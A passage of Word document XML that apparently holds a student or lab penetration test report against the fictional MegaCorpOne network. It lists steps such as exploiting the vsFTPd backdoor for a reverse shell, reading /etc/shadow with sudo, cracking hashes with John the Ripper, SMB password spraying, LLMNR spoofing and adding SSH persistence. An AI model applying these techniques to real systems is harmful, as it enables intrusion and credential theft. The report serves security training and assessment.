    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Recon-ng: we found the domain server and number of hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In terminal we viewed all installed modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ran a query hackettarget.com for a scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> against megacorpone.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Generate a report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Information found: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>90 hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Password Guessing: we were able to guess Tom Hudson’s password. His password is the same as his username - thusdson/thudson.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NMAP scan: With a simple nmap scan, we learned that port 21 was vulnerable to a backdoor exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VULNERABLE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vsFTPd version 2.3.4 backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>State: VULNERABLE (Exploitable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation: We used Searchsploit to seach for exploits against port 21. This gave </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>us access to reverse shell into the machine. We edited the script in nano with the backdoor execution path and ran the new script. “Success, shell opened” on 172.17.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C2 Research: Because we were able to gather information on MegaCorpOne’s Domain, we wer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e able to lookup what C2 framework we could use. The one we chose was Metasploit because it allows the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> It must support the channels of HTTP and SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>It must support Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>It must provide logging.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Privilege Escalation: We were asked to test i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f employees were saving their passwords as plain text. We were able to cat the msfadmin password as a low-privileged user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Use find command to search keywords in the system such as “admin” and “password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This led us to adminpassword.txt whic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>h had the password unencrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Password Cracking: Once we had full access to the system, we were able to unencrypt all the users’ passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We ran sudo ls /home to gather a list of users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Then we ran sudo cat /etc/shadow to gather hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We saved this in</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>formation in a text file and ran johntheripper “john” and collected the passwords of all users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Persistence: We added another port to the SSH config file by editing the file using Nano, adding another port (10022) and after a quick reboot, we were able to S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SH into the target host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows Port Scanning: We ran the nmap command to find out there are two windows machines, found the following open ports: 445 SMB, 139 RPC/SMB, 3389 RDP, 88 Kerberos, and learned that port 88 is the Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Password Spr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">aying: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Opened Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Loaded auxiliary/scanner/smb/smb_login module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Used tstark credentials to login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Set SMBDomain to the domain of the Windows10 machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Set RHOSTS to the entire subnet in CIDR notation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We were able to log into 172.22.117.20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">LLMNR Spoofing: We collected </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Run responder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Collect the password hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Save it to a text file and run johntheripper on it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We collected Peter Parker’s username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation (WMI): We used parker and tstarks’ credentials to run commands on the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Load the scanner/smb/impacket/wmiexec module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We manipulated the set command to collect the following information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ion and build number of Windows:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono" w:cs="Roboto Mono"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.0.19042 Build 19042</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Processor architecture is the machine: x64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>No logged in users</w:t>
      </w:r>
    </w:p>
